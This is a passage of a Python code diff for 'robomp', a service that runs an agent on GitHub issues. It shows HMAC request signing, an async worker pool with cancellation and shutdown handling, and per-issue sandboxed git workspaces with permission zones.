|
||||
hashlib.sha256(body or b"").hexdigest().encode("ascii"),
|
||||
)
|
||||
)
|
||||
|
||||
|
||||
def sign(
|
||||
*,
|
||||
method: str,
|
||||
path: str,
|
||||
body: bytes,
|
||||
key: bytes,
|
||||
timestamp: str | None = None,
|
||||
) -> tuple[str, str]:
|
||||
"""Return `(timestamp, signature_hex)` for the given request shape.
|
||||
|
||||
`timestamp` may be supplied explicitly (replay tests); otherwise the
|
||||
current unix epoch in integer seconds is used. `path` MUST be the URL
|
||||
path-only portion (no scheme, host, or query string trimming) so client
|
||||
and server agree on the canonical form.
|
||||
"""
|
||||
ts = timestamp if timestamp is not None else str(int(time.time()))
|
||||
sig = hmac.new(key, _string_to_sign(method, path, ts, body), hashlib.sha256).hexdigest()
|
||||
return ts, sig
|
||||
|
||||
|
||||
class VerifyResult(NamedTuple):
|
||||
ok: bool
|
||||
reason: str
|
||||
|
||||
|
||||
def verify(
|
||||
*,
|
||||
method: str,
|
||||
path: str,
|
||||
body: bytes,
|
||||
timestamp: str | None,
|
||||
signature: str | None,
|
||||
key: bytes,
|
||||
now: float | None = None,
|
||||
skew: int = DEFAULT_SKEW_SECONDS,
|
||||
) -> VerifyResult:
|
||||
"""Validate an incoming request. Returns `(ok, reason)`.
|
||||
|
||||
Any malformed input returns ok=False with a short reason. The reason
|
||||
string is suitable for logging but should NOT be echoed back to the
|
||||
caller (it leaks whether the failure was timestamp vs signature).
|
||||
"""
|
||||
if not timestamp or not signature:
|
||||
return VerifyResult(False, "missing signature headers")
|
||||
try:
|
||||
ts_int = int(timestamp)
|
||||
except ValueError:
|
||||
return VerifyResult(False, "malformed timestamp")
|
||||
now_int = int(now if now is not None else time.time())
|
||||
if abs(now_int - ts_int) > skew:
|
||||
return VerifyResult(False, "timestamp outside skew window")
|
||||
expected = hmac.new(key, _string_to_sign(method, path, timestamp, body), hashlib.sha256).hexdigest()
|
||||
if not hmac.compare_digest(expected, signature):
|
||||
return VerifyResult(False, "signature mismatch")
|
||||
return VerifyResult(True, "")
|
||||
|
||||
|
||||
__all__ = [
|
||||
"DEFAULT_SKEW_SECONDS",
|
||||
"HEADER_SIGNATURE",
|
||||
"HEADER_TIMESTAMP",
|
||||
"VerifyResult",
|
||||
"sign",
|
||||
"verify",
|
||||
]
|
||||
@@ -0,0 +1,409 @@
|
||||
"""Async worker pool draining the durable sqlite event queue."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import logging
|
||||
import os
|
||||
import traceback
|
||||
from collections.abc import Callable
|
||||
from contextlib import suppress
|
||||
|
||||
from robomp import tasks
|
||||
from robomp.cancellation import clear_current_event, set_current_event
|
||||
from robomp.config import Settings
|
||||
from robomp.db import Database, EventRow
|
||||
from robomp.github_backend import GitHubBackend
|
||||
from robomp.sandbox import GitTransport, SandboxManager, _reap_slot
|
||||
from robomp.slot_pool import SlotPool
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class WorkerPool:
|
||||
"""Long-lived dispatcher: drains queued events into per-task coroutines."""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
*,
|
||||
settings: Settings,
|
||||
db: Database,
|
||||
github: GitHubBackend,
|
||||
sandbox: SandboxManager,
|
||||
git_transport: GitTransport,
|
||||
slot_pool: SlotPool | None = None,
|
||||
) -> None:
|
||||
self.settings = settings
|
||||
self.db = db
|
||||
self.github = github
|
||||
self.sandbox = sandbox
|
||||
self.git_transport = git_transport
|
||||
self._workers: list[asyncio.Task[None]] = []
|
||||
self._wakeup = asyncio.Event()
|
||||
self._stop = asyncio.Event()
|
||||
self._slot_pool: SlotPool | None
|
||||
self._semaphore: asyncio.Semaphore | None
|
||||
if slot_pool is not None:
|
||||
self._slot_pool = slot_pool
|
||||
self._semaphore = None
|
||||
elif os.geteuid() == 0:
|
||||
self._slot_pool = SlotPool(range(2001, 2001 + settings.max_concurrency))
|
||||
self._semaphore = None
|
||||
else:
|
||||
self._slot_pool = None
|
||||
self._semaphore = asyncio.Semaphore(settings.max_concurrency)
|
||||
self._inflight: set[str] = set()
|
||||
self._inflight_lock = asyncio.Lock()
|
||||
# Cancellation: workers register a stop hook via the contextvar helpers
|
||||
# in this module; the API surface fires them on demand. Plain dict/set
|
||||
# are GIL-safe for single-key ops, which is all we do.
|
||||
self._cancel_hooks: dict[str, Callable[[], None]] = {}
|
||||
self._cancelled: set[str] = set()
|
||||
# Phase B (graceful shutdown): track each spawned `_run_event` task so
|
||||
# `stop()` can drain in-flight work, and a flag the exception path
|
||||
# checks to avoid marking shutdown-interrupted rows as `failed` (we
|
||||
# want them to stay `running` so `reset_stuck_running()` requeues
|
||||
# them on next start; the agent then resumes via `--continue`).
|
||||
self._inflight_tasks: dict[asyncio.Task[None], str] = {}
|
||||
self._shutting_down: bool = False
|
||||
# Deliveries whose `_run_event` we deliberately interrupted via
|
||||
# `stop()` (either by firing the registered cancel hook or by
|
||||
# cancelling the asyncio task itself). The exception path uses
|
||||
# this — NOT `_shutting_down` — to decide whether to suppress
|
||||
# `mark_event(..., 'failed')`. Without this distinction, an
|
||||
# unrelated dispatch failure during the drain window would be
|
||||
# silently masked and requeued as if nothing went wrong.
|
||||
self._shutdown_cancelled: set[str] = set()
|
||||
|
||||
def wake(self) -> None:
|
||||
"""Signal that new work is available."""
|
||||
self._wakeup.set()
|
||||
|
||||
async def inflight_snapshot(self) -> list[str]:
|
||||
"""Return a stable, sorted snapshot of currently in-flight issue keys."""
|
||||
async with self._inflight_lock:
|
||||
return sorted(self._inflight)
|
||||
|
||||
async def _reap_all_slots(self) -> None:
|
||||
if self._slot_pool is None:
|
||||
return
|
||||
await asyncio.gather(*(asyncio.to_thread(_reap_slot, uid) for uid in self._slot_pool.slot_uids))
|
||||
|
||||
async def start(self) -> None:
|
||||
await self._reap_all_slots()
|
||||
recovered = self.db.reset_stuck_running()
|
||||
if recovered:
|
||||
log.info("recovered stuck events", extra={"count": recovered})
|
||||
# Single dispatcher loop is simpler than N workers; concurrency is gated by the slot pool.
|
||||
self._workers.append(asyncio.create_task(self._dispatch_loop(), name="robomp-dispatch"))
|
||||
# Periodic natives-cache GC, if enabled. Sleep-first so a freshly
|
||||
# restarted orchestrator doesn't burn CPU on a cold cache.
|
||||
if self.sandbox.natives_cache is not None and self.settings.natives_cache_gc_interval_seconds > 0:
|
||||
self._workers.append(asyncio.create_task(self._natives_cache_gc_loop(), name="robomp-natives-gc"))
|
||||
|
||||
async def stop(self, *, drain_timeout: float = 25.0, kill_timeout: float = 5.0) -> None:
|
||||
"""Halt the dispatcher, then drain (or kill) in-flight `_run_event` tasks.
|
||||
|
||||
Cleanly interrupted tasks intentionally leave their DB row in
|
||||
`running` so the next `WorkerPool.start()` re-queues them via
|
||||
`reset_stuck_running()`. The resumed omp session then picks up via
|
||||
`--continue` from the persisted JSONL transcript.
|
||||
"""
|
||||
self._shutting_down = True
|
||||
self._stop.set()
|
||||
self._wakeup.set()
|
||||
# 1. Halt the dispatcher (no new claims).
|
||||
for worker in self._workers:
|
||||
worker.cancel()
|
||||
for worker in self._workers:
|
||||
with suppress(asyncio.CancelledError):
|
||||
await worker
|
||||
self._workers.clear()
|
||||
# 2. Give in-flight tasks a chance to drain.
|
||||
pending = list(self._inflight_tasks)
|
||||
if not pending:
|
||||
return
|
||||
log.info("draining in-flight tasks", extra={"count": len(pending), "timeout": drain_timeout})
|
||||
_, still_running = await asyncio.wait(pending, timeout=drain_timeout)
|
||||
if not still_running:
|
||||
return
|
||||
# 3. Time's up — for every still-running task: fire its cancel hook
|
||||
# if one was registered (kills the omp subprocess); otherwise
|
||||
# cancel the asyncio task itself so a worker stuck pre-hook
|
||||
# (e.g. waiting on the slot pool or inside RpcClient.__enter__)
|
||||
# cannot proceed to spawn a fresh subprocess after stop()
|
||||
# returns. Either way we record the delivery id in
|
||||
# `_shutdown_cancelled` so `_run_event`'s exception path
|
||||
# suppresses `mark_event(..., 'failed')` for that row only.
|
||||
log.warning("shutdown timeout; interrupting in-flight tasks", extra={"count": len(still_running)})
|
||||
for task in still_running:
|
||||
delivery_id = self._inflight_tasks.get(task)
|
||||
if delivery_id is None:
|
||||
# Task was already finalizing; nothing left to interrupt.
|
||||
task.cancel()
|
||||
continue
|
||||
self._shutdown_cancelled.add(delivery_id)
|
||||
hook = self._cancel_hooks.pop(delivery_id, None)
|
||||
if hook is not None:
|
||||
try:
|
||||
await asyncio.to_thread(hook)
|
||||
except Exception:
|
||||
log.exception("shutdown hook raised", extra={"delivery": delivery_id})
|
||||
continue
|
||||
# No hook armed yet — the worker hasn't reached the omp spawn
|
||||
# point. Cancel the asyncio task directly so its body cannot
|
||||
# run past stop().
|
||||
task.cancel()
|
||||
# 4. Brief wait for the exception path / cancellation to settle.
|
||||
with suppress(TimeoutError):
|
||||
await asyncio.wait(still_running, timeout=kill_timeout)
|
||||
|
||||
async def _natives_cache_gc_loop(self) -> None:
|
||||
"""Periodic sweep over every per-repo cache directory.
|
||||
|
||||
Each iteration sleeps the configured interval first, then runs the
|
||||
synchronous GC on a worker thread. Cancellation is the only exit;
|
||||
any per-sweep failure is logged and the loop continues.
|
||||
"""
|
||||
cache = self.sandbox.natives_cache
|
||||
if cache is None: # pragma: no cover — checked by caller
|
||||
return
|
||||
interval = self.settings.natives_cache_gc_interval_seconds
|
||||
log.info("natives_cache gc loop online", extra={"interval": interval})
|
||||
try:
|
||||
while not self._stop.is_set():
|
||||
try:
|
||||
await asyncio.wait_for(self._stop.wait(), timeout=interval)
|
||||
return # stop was set during the wait
|
||||
except TimeoutError:
|
||||
pass
|
||||
try:
|
||||
evicted = await asyncio.to_thread(cache.gc)
|
||||
if evicted:
|
||||
log.info("natives_cache gc swept", extra={"evicted": evicted})
|
||||
except Exception:
|
||||
log.exception("natives_cache gc raised")
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
|
||||
async def _dispatch_loop(self) -> None:
|
||||
log.info("dispatch loop online")
|
||||
try:
|
||||
while not self._stop.is_set():
|
||||
row = await self._claim_next_unique()
|
||||
if row is None:
|
||||
self._wakeup.clear()
|
||||
try:
|
||||
await asyncio.wait_for(self._wakeup.wait(), timeout=10.0)
|
||||
except TimeoutError:
|
||||
pass
|
||||
continue
|
||||
# Schedule the task; the slot pool caps concurrent execution.
|
||||
task = asyncio.create_task(self._run_event(row), name=f"robomp-event-{row.delivery_id[:8]}")
|
||||
self._inflight_tasks[task] = row.delivery_id
|
||||
task.add_done_callback(lambda t: self._inflight_tasks.pop(t, None))
|
||||
except asyncio.CancelledError:
|
||||
raise
|
||||
except Exception:
|
||||
log.exception("dispatch loop crashed")
|
||||
|
||||
async def _claim_next_unique(self) -> EventRow | None:
|
||||
"""Claim the next event whose issue isn't already inflight."""
|
||||
# The DB layer doesn't filter by issue_key; we peek then guard with a set.
|
||||
async with self._inflight_lock:
|
||||
# Naive but fine for v1 (small queue).
|
||||
row = await asyncio.to_thread(self.db.claim_next_event)
|
||||
if row is None:
|
||||
return None
|
||||
key = row.issue_key or row.delivery_id
|
||||
if key in self._inflight:
|
||||
# Put it back; another in-flight task is touching the same issue.
|
||||
await asyncio.to_thread(self.db.requeue_event, row.delivery_id, from_states=("running",))
|
||||
# Sleep briefly so we don't spin.
|
||||
await asyncio.sleep(0.5)
|
||||
return None
|
||||
self._inflight.add(key)
|
||||
return row
|
||||
|
||||
async def _release(self, row: EventRow) -> None:
|
||||
key = row.issue_key or row.delivery_id
|
||||
async with self._inflight_lock:
|
||||
self._inflight.discard(key)
|
||||
|
||||
def _arm_cancel(self, delivery_id: str, hook: Callable[[], None]) -> None:
|
||||
"""Worker-side: install the cancel hook.
|
||||
|
||||
If cancellation was already requested before the worker reached this
|
||||
point, fire the hook immediately so we don't lose the signal.
|
||||
"""
|
||||
if delivery_id in self._cancelled:
|
||||
try:
|
||||
hook()
|
||||
except Exception:
|
||||
log.exception("late cancel fire failed", extra={"delivery": delivery_id})
|
||||
return
|
||||
self._cancel_hooks[delivery_id] = hook
|
||||
|
||||
def _disarm_cancel(self, delivery_id: str) -> None:
|
||||
"""Worker-side: clear the cancel hook (the resource is gone)."""
|
||||
self._cancel_hooks.pop(delivery_id, None)
|
||||
|
||||
async def cancel_event(self, delivery_id: str) -> bool:
|
||||
"""Request cancellation of a running event. Returns whether a hook fired.
|
||||
|
||||
Marks the delivery as cancelled regardless of whether a worker is
|
||||
currently armed, so a late-armed hook still observes the request. The
|
||||
worker thread's exception path is what eventually transitions the row
|
||||
to `failed` with a cancellation marker.
|
||||
"""
|
||||
self._cancelled.add(delivery_id)
|
||||
hook = self._cancel_hooks.pop(delivery_id, None)
|
||||
if hook is None:
|
||||
return False
|
||||
# `hook` typically kills a subprocess; run it off the loop so its wait()
|
||||
# doesn't stall the event loop for up to the omp shutdown grace period.
|
||||
try:
|
||||
await asyncio.to_thread(hook)
|
||||
except Exception:
|
||||
log.exception("cancel hook raised", extra={"delivery": delivery_id})
|
||||
return True
|
||||
|
||||
async def _run_event(self, row: EventRow) -> None:
|
||||
token = set_current_event(self, row.delivery_id)
|
||||
slot_uid: int | None = None
|
||||
slot_acquired = False
|
||||
try:
|
||||
if self._slot_pool is not None:
|
||||
slot_uid = await self._slot_pool.acquire()
|
||||
slot_acquired = True
|
||||
await self._dispatch_and_mark(row, slot_uid=slot_uid)
|
||||
elif self._semaphore is not None:
|
||||
async with self._semaphore:
|
||||
await self._dispatch_and_mark(row)
|
||||
else:
|
||||
await self._dispatch_and_mark(row)
|
||||
except Exception as exc:
|
||||
if row.delivery_id in self._shutdown_cancelled:
|
||||
# `stop()` deliberately interrupted this delivery —
|
||||
# leave the row in `running` so `reset_stuck_running()`
|
||||
# flips it back to `queued` on the next start and the
|
||||
# resumed omp session picks up via `--continue`.
|
||||
# Other exceptions during the drain window (which
|
||||
# would also see `_shutting_down=True`) MUST still
|
||||
# mark the row failed; otherwise a genuine bug gets
|
||||
# silently requeued.
|
||||
log.info(
|
||||
"event interrupted by shutdown",
|
||||
extra={"delivery": row.delivery_id, "key": row.issue_key},
|
||||
)
|
||||
elif row.delivery_id in self._cancelled:
|
||||
log.info("event cancelled", extra={"delivery": row.delivery_id})
|
||||
self.db.mark_event(row.delivery_id, "failed", error="cancelled by operator")
|
||||
else:
|
||||
tb = traceback.format_exc(limit=20)
|
||||
log.exception("event handler failed", extra={"delivery": row.delivery_id})
|
||||
self.db.mark_event(row.delivery_id, "failed", error=f"{exc}\n{tb}")
|
||||
finally:
|
||||
self._cancelled.discard(row.delivery_id)
|
||||
self._shutdown_cancelled.discard(row.delivery_id)
|
||||
self._cancel_hooks.pop(row.delivery_id, None)
|
||||
if slot_acquired and self._slot_pool is not None:
|
||||
try:
|
||||
_reap_slot(slot_uid)
|
||||
finally:
|
||||
self._slot_pool.release(slot_uid)
|
||||
await self._release(row)
|
||||
clear_current_event(token)
|
||||
|
||||
async def _dispatch_and_mark(self, row: EventRow, *, slot_uid: int | None = None) -> None:
|
||||
await self._dispatch(row, slot_uid=slot_uid)
|
||||
if row.delivery_id in self._cancelled:
|
||||
self.db.mark_event(row.delivery_id, "failed", error="cancelled by operator")
|
||||
else:
|
||||
self.db.mark_event(row.delivery_id, "done")
|
||||
|
||||
async def _dispatch(self, row: EventRow, *, slot_uid: int | None = None) -> None:
|
||||
event = row.event_type
|
||||
action = str(row.payload.get("action") or "")
|
||||
log.info(
|
||||
"dispatch",
|
||||
extra={
|
||||
"event": event,
|
||||
"action": action,
|
||||
"delivery": row.delivery_id,
|
||||
"key": row.issue_key,
|
||||
"attempts": row.attempts,
|
||||
"recovered": row.attempts >= 2,
|
||||
},
|
||||
)
|
||||
if event == "issues" and action == "opened":
|
||||
await tasks.triage_issue(
|
||||
settings=self.settings,
|
||||
db=self.db,
|
||||
github=self.github,
|
||||
sandbox=self.sandbox,
|
||||
git_transport=self.git_transport,
|
||||
payload=row.payload,
|
||||
delivery_id=row.delivery_id,
|
||||
attempts=row.attempts,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
elif event == "issue_comment" and action == "created":
|
||||
issue = row.payload.get("issue") or {}
|
||||
if "pull_request" in issue:
|
||||
await tasks.handle_pr_conversation(
|
||||
settings=self.settings,
|
||||
db=self.db,
|
||||
github=self.github,
|
||||
sandbox=self.sandbox,
|
||||
git_transport=self.git_transport,
|
||||
payload=row.payload,
|
||||
delivery_id=row.delivery_id,
|
||||
attempts=row.attempts,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
else:
|
||||
await tasks.handle_comment(
|
||||
settings=self.settings,
|
||||
db=self.db,
|
||||
github=self.github,
|
||||
sandbox=self.sandbox,
|
||||
git_transport=self.git_transport,
|
||||
payload=row.payload,
|
||||
delivery_id=row.delivery_id,
|
||||
attempts=row.attempts,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
elif event == "pull_request_review_comment" and action == "created":
|
||||
await tasks.handle_review(
|
||||
settings=self.settings,
|
||||
db=self.db,
|
||||
github=self.github,
|
||||
sandbox=self.sandbox,
|
||||
git_transport=self.git_transport,
|
||||
payload=row.payload,
|
||||
delivery_id=row.delivery_id,
|
||||
attempts=row.attempts,
|
||||
slot_uid=slot_uid,
|
||||
)
|
||||
elif event == "issues" and action == "closed":
|
||||
await tasks.cleanup_workspace(
|
||||
settings=self.settings,
|
||||
db=self.db,
|
||||
sandbox=self.sandbox,
|
||||
payload=row.payload,
|
||||
target_state="closed",
|
||||
)
|
||||
elif event == "pull_request" and action == "closed":
|
||||
await tasks.cleanup_workspace(
|
||||
settings=self.settings,
|
||||
db=self.db,
|
||||
sandbox=self.sandbox,
|
||||
payload=row.payload,
|
||||
target_state="merged",
|
||||
)
|
||||
else:
|
||||
log.info("no-op dispatch", extra={"event": event, "action": action})
|
||||
|
||||
|
||||
__all__ = ["WorkerPool"]
|
||||
@@ -0,0 +1,896 @@
|
||||
"""Per-issue workspace lifecycle: clone pool + git worktrees.
|
||||
|
||||
The remote-facing git operations (clone, fetch, push) go through a pluggable
|
||||
`GitTransport` so a deploy can keep the PAT entirely in a separate `gh-proxy`
|
||||
container. The default `LocalGitTransport` runs git in-process with ephemeral
|
||||
PAT injection via `--config-env` (see `robomp.git_ops`); the `ProxyGitTransport`
|
||||
in `robomp.proxy_client` forwards the same set of operations over HMAC RPC.
|
||||
|
||||
Per-issue worktree add/remove stays local — those operations only touch the
|
||||
shared on-disk pool clone, no remote authentication required.
|
||||
|
||||
Permission model
|
||||
----------------
|
||||
There are four ownership zones on disk; do not let them blur:
|
||||
|
||||
1. **Workspace tree** (`/data/workspaces/<key>/`, including `repo/`,
|
||||
`.omp-session/`, `context/`, `artifacts/`, `.omp-tmp/`, `.omp-xdg/`):
|
||||
single-owner. Owned by the active slot UID/GID (`omp-N`) with mode
|
||||
`u=rwX,g=rwX,o=` (effectively `0770` dirs / `0660` files; the group is
|
||||
the slot's own private gid so group bits are functionally identical to
|
||||
owner-only). The orchestrator (root) reads/writes via uid-0 bypass when
|
||||
it must, and drops to the slot for any subprocess that touches paths the
|
||||
agent will revisit. `ensure_workspace` + `_chown_workspace` are the
|
||||
single point of truth for this zone — no other helper sets ownership
|
||||
inside `ws_root`.
|
||||
2. **Clone pool** (`/data/workspaces/_pool/<owner>__<repo>/`): genuinely
|
||||
multi-slot. Owned by `root:omp` (gid 2000) with setgid `02770`; cross-slot
|
||||
writes are bridged by `_share_git_metadata_with_slots`.
|
||||
3. **Language tool caches** (`/data/cache/{cargo,cargo-target,rustup,bun-cache}`):
|
||||
multi-slot. Owned by `root:omp` with setgid `02770`; provisioned by
|
||||
`entrypoint.sh`.
|
||||
4. **Agent HOME template** (`/srv/agent-home`): read-only, `root:root`
|
||||
`0755/0644`.
|
||||
|
||||
Bun's install cache stays workspace-private (zone 1) on purpose — bun
|
||||
chmod/utimes its own cache root, which breaks any shared-cache scheme.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import logging
|
||||
import os
|
||||
import platform
|
||||
import re
|
||||
import secrets
|
||||
import shutil
|
||||
import signal
|
||||
import stat
|
||||
import subprocess
|
||||
from dataclasses import dataclass
|
||||
from pathlib import Path
|
||||
from typing import Any, Protocol
|
||||
|
||||
from robomp.git_ops import (
|
||||
GitCommandError,
|
||||
PushResult,
|
||||
redact_credentials,
|
||||
)
|
||||
from robomp.git_ops import (
|
||||
clone as git_clone,
|
||||
)
|
||||
from robomp.git_ops import (
|
||||
fetch_prune as git_fetch_prune,
|
||||
)
|
||||
from robomp.git_ops import (
|
||||
fetch_ref as git_fetch_ref,
|
||||
)
|
||||
from robomp.git_ops import (
|
||||
push as git_push,
|
||||
)
|
||||
from robomp.natives_cache import CacheHit, NativesCache
|
||||
from robomp.natives_cache import compute_key as natives_compute_key
|
||||
|
||||
log = logging.getLogger(__name__)
|
||||
|
||||
|
||||
@dataclass(slots=True)
|
||||
class Workspace:
|
||||
"""Resolved per-issue scratch space."""
|
||||
|
||||
root: Path
|
||||
repo_dir: Path
|
||||
session_dir: Path
|
||||
context_dir: Path
|
||||
artifacts_dir: Path
|
||||
branch: str
|
||||
repo_full_name: str
|
||||
issue_number: int
|
||||
|
||||
@property
|
||||
def repro_dir(self) -> Path:
|
||||
return self.context_dir / "repro"
|
||||
|
||||
@property
|
||||
def workspace_key(self) -> str:
|
||||
return workspace_key(self.repo_full_name, self.issue_number)
|
||||
|
||||
|
||||
def _slug(text: str, *, length: int = 40) -> str:
|
||||
cleaned = re.sub(r"[^a-z0-9]+", "-", text.lower()).strip("-")
|
||||
if not cleaned:
|
||||
cleaned = "issue"
|
||||
return cleaned[:length]
|
||||
|
||||
|
||||
def _short_hex(seed: str | None = None) -> str:
|
||||
if seed:
|
||||
return hashlib.sha1(seed.encode("utf-8")).hexdigest()[:8]
|
||||
return secrets.token_hex(4)
|
||||
|
||||
|
||||
def workspace_key(repo: str, number: int) -> str:
|
||||
return f"{repo.replace('/', '__')}__{number}"
|
||||
|
||||
|
||||
def _safe_directory_env(repo_dir: Path) -> dict[str, str]:
|
||||
"""Return a Git config env overlay whitelisting ``repo_dir`` as safe."""
|
||||
return {
|
||||
"GIT_CONFIG_COUNT": "1",
|
||||
"GIT_CONFIG_KEY_0": "safe.directory",
|
||||
"GIT_CONFIG_VALUE_0": str(repo_dir),
|
||||
}
|
||||
|
||||
|
||||
def _git_env_for_repo(repo_dir: Path) -> dict[str, str]:
|
||||
env = os.environ.copy()
|
||||
env.update(_safe_directory_env(repo_dir))
|
||||
env["GIT_TERMINAL_PROMPT"] = "0"
|
||||
return env
|
||||
|
||||
|
||||
def make_branch(*, issue_number: int, title: str, seed: str | None = None) -> str:
|
||||
return f"farm/{_short_hex(seed or f'{issue_number}-{title}')}/{_slug(title or f'issue-{issue_number}')}"
|
||||
|
||||
|
||||
_BRANCH_SLUG_RE = re.compile(r"^[a-z0-9]+(?:-[a-z0-9]+)*$")
|
||||
|
||||
|
||||
def validate_branch_slug(slug: object) -> str:
|
||||
"""Return ``slug`` if it is a valid kebab-case branch slug, else raise.
|
||||
|
||||
Rules: 1-50 chars, only ``[a-z0-9-]``, no leading/trailing hyphen, no
|
||||
double hyphen. Raises ``ValueError`` otherwise.
|
||||
"""
|
||||
if not isinstance(slug, str) or not _BRANCH_SLUG_RE.fullmatch(slug) or len(slug) > 50:
|
||||
raise ValueError(
|
||||
f"invalid branch slug {slug!r}: expected kebab-case [a-z0-9-], 1-50 chars, no leading/trailing/double hyphen"
|
||||
)
|
||||
return slug
|
||||
|
||||
|
||||
def rename_workspace_branch(
|
||||
workspace: Workspace,
|
||||
new_slug: str,
|
||||
*,
|
||||
pr_number: int | None = None,
|
||||
slot_uid: int | None = None,
|
||||
) -> str:
|
||||
"""Rename the workspace's local branch to ``farm/<hex>/<new_slug>``.
|
||||
|
||||
The 8-hex disambiguator stays untouched; only the trailing slug after
|
||||
the second `/` changes. Runs ``git branch -m`` inside the worktree
|
||||
(which updates the shared refs in the pool) and mutates
|
||||
``workspace.branch`` in place.
|
||||
|
||||
Idempotent when the computed branch already matches ``workspace.branch``.
|
||||
Raises ``ValueError`` for syntactically invalid slugs or for a
|
||||
workspace whose branch isn't on the ``farm/<hex>/<slug>`` shape.
|
||||
Raises ``GitCommandError`` if the underlying ``git`` invocation fails
|
||||
(e.g. the target branch name is already taken).
|
||||
|
||||
When ``pr_number`` is provided (non-None), the rename is a no-op: an
|
||||
open PR on origin still tracks ``workspace.branch``, and renaming it
|
||||
locally would orphan the PR by leaving its head on a branch that no
|
||||
longer receives pushes. The slug is still validated so callers see
|
||||
the same input errors as the rename path.
|
||||
"""
|
||||
validate_branch_slug(new_slug)
|
||||
parts = workspace.branch.split("/", 2)
|
||||
if len(parts) != 3 or parts[0] != "farm" or not parts[1]:
|
||||
raise ValueError(f"refusing to rename non-farm branch {workspace.branch!r}")
|
||||
new_branch = f"farm/{parts[1]}/{new_slug}"
|
||||
if new_branch == workspace.branch:
|
||||
return new_branch
|
||||
if pr_number is not None:
|
||||
log.warning(
|
||||
"rename_workspace_branch skipped: PR #%d already tracks %r; refusing to rename to %r",
|
||||
pr_number,
|
||||
workspace.branch,
|
||||
new_branch,
|
||||
)
|
||||
return workspace.branch
|
||||
proc = _safe_run(
|
||||
["git", "branch", "-m", workspace.branch, new_branch],
|
||||
cwd=workspace.repo_dir,
|
||||
**_slot_subprocess_kwargs(slot_uid),
|
||||
)
|
||||
if proc.returncode != 0:
|
||||
raise GitCommandError(
|
||||
["git", "branch", "-m", workspace.branch, new_branch],
|
||||
proc.returncode,
|
||||
proc.stdout,
|
||||
proc.stderr,
|
||||
)
|
||||
_share_git_metadata_with_slots(workspace.repo_dir, slot_uid)
|
||||
workspace.branch = new_branch
|
||||
return new_branch
|
||||
|
||||
|
||||
# ---------- GitTransport (transport abstraction over clone/fetch/push) ----------
|
||||
|
||||
|
||||
class GitTransport(Protocol):
|
||||
"""Pluggable remote-facing git operations.
|
||||
|
||||
Two implementations ship in-tree:
|
||||
- `LocalGitTransport`: in-process git with PAT injected per invocation.
|
||||
- `robomp.proxy_client.ProxyGitTransport`: forwards over HMAC RPC.
|
||||
"""
|
||||
|
||||
def clone_pool(self, *, repo: str, clone_url: str, default_branch: str, target: Path) -> None:
|
||||
"""Fresh clone into `target`. `target` must not exist (or be empty)."""
|
||||
...
|
||||
|
||||
def fetch_pool(self, *, repo: str, pool_dir: Path) -> None:
|
||||
"""`git fetch --prune origin` against the shared pool clone."""
|
||||
...
|
||||
|
||||
def fetch_base_ref(self, *, repo: str, pool_dir: Path, ref: str) -> None:
|
||||
"""Best-effort `git fetch origin <ref>` to ensure the base branch is local."""
|
||||
...
|
||||
|
||||
def push_branch(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
workspace_key: str,
|
||||
repo_dir: Path,
|
||||
branch: str,
|
||||
expected_head: str,
|
||||
slot_uid: int | None = None,
|
||||
) -> PushResult:
|
||||
"""Push `branch` to origin. MUST refuse if HEAD has drifted from `expected_head`."""
|
||||
...
|
||||
|
||||
|
||||
class LocalGitTransport:
|
||||
"""Default GitTransport: run git in-process with ephemeral PAT injection.
|
||||
|
||||
`token` MAY be `None` for tests against a local bare repo (no auth) or in
|
||||
deploys where the orchestrator does not hold a PAT (but then the proxy
|
||||
transport should be used instead).
|
||||
"""
|
||||
|
||||
__slots__ = ("_token",)
|
||||
|
||||
def __init__(self, token: str | None) -> None:
|
||||
self._token = token
|
||||
|
||||
def clone_pool(self, *, repo: str, clone_url: str, default_branch: str, target: Path) -> None:
|
||||
del repo # unused; URL identifies the remote
|
||||
git_clone(target, clone_url=clone_url, default_branch=default_branch, token=self._token)
|
||||
|
||||
def fetch_pool(self, *, repo: str, pool_dir: Path) -> None:
|
||||
del repo
|
||||
git_fetch_prune(pool_dir, token=self._token)
|
||||
|
||||
def fetch_base_ref(self, *, repo: str, pool_dir: Path, ref: str) -> None:
|
||||
del repo
|
||||
git_fetch_ref(pool_dir, ref, token=self._token)
|
||||
|
||||
def push_branch(
|
||||
self,
|
||||
*,
|
||||
repo: str,
|
||||
workspace_key: str,
|
||||
repo_dir: Path,
|
||||
branch: str,
|
||||
expected_head: str,
|
||||
slot_uid: int | None = None,
|
||||
) -> PushResult:
|
||||
del repo, workspace_key
|
||||
return git_push(repo_dir, branch=branch, expected_head=expected_head, token=self._token, slot_uid=slot_uid)
|
||||
|
||||
|
||||
# ---------- low-level helpers retained for callers expecting old shape ----------
|
||||
|
||||
|
||||
def _safe_run(cmd: list[str], *, cwd: Path | None = None, **kwargs: Any) -> subprocess.CompletedProcess[str]:
|
||||
"""Run without raising; caller decides on returncode. Credentials are redacted from any captured output."""
|
||||
proc = subprocess.run(
|
||||
cmd,
|
||||
cwd=str(cwd) if cwd else None,
|
||||
check=False,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
**kwargs,
|
||||
)
|
||||
if proc.stdout:
|
||||
proc.stdout = redact_credentials(proc.stdout)
|
||||
if proc.stderr:
|
||||
proc.stderr = redact_credentials(proc.stderr)
|
||||
return proc
|
||||
|
||||
|
||||
def _run(cmd: list[str], *, cwd: Path | None = None) -> subprocess.CompletedProcess[str]:
|
||||
"""Legacy raising helper (still used by a sandbox test). Forwards to subprocess.run."""
|
||||
proc = subprocess.run(
|
||||
cmd,
|
||||
cwd=str(cwd) if cwd else None,
|
||||
check=False,
|
||||
capture_output=True,
|
||||
text=True,
|
||||
)
|
||||
if proc.returncode != 0:
|
||||
raise GitCommandError(cmd, proc.returncode, proc.stdout, proc.stderr)
|
||||
return proc
|
||||
|
||||
|
||||
_SHARED_OMP_GID = 2000
|
||||
|
||||
|
||||
def _slot_permissions_active(slot_uid: int | None) -> bool:
|
||||
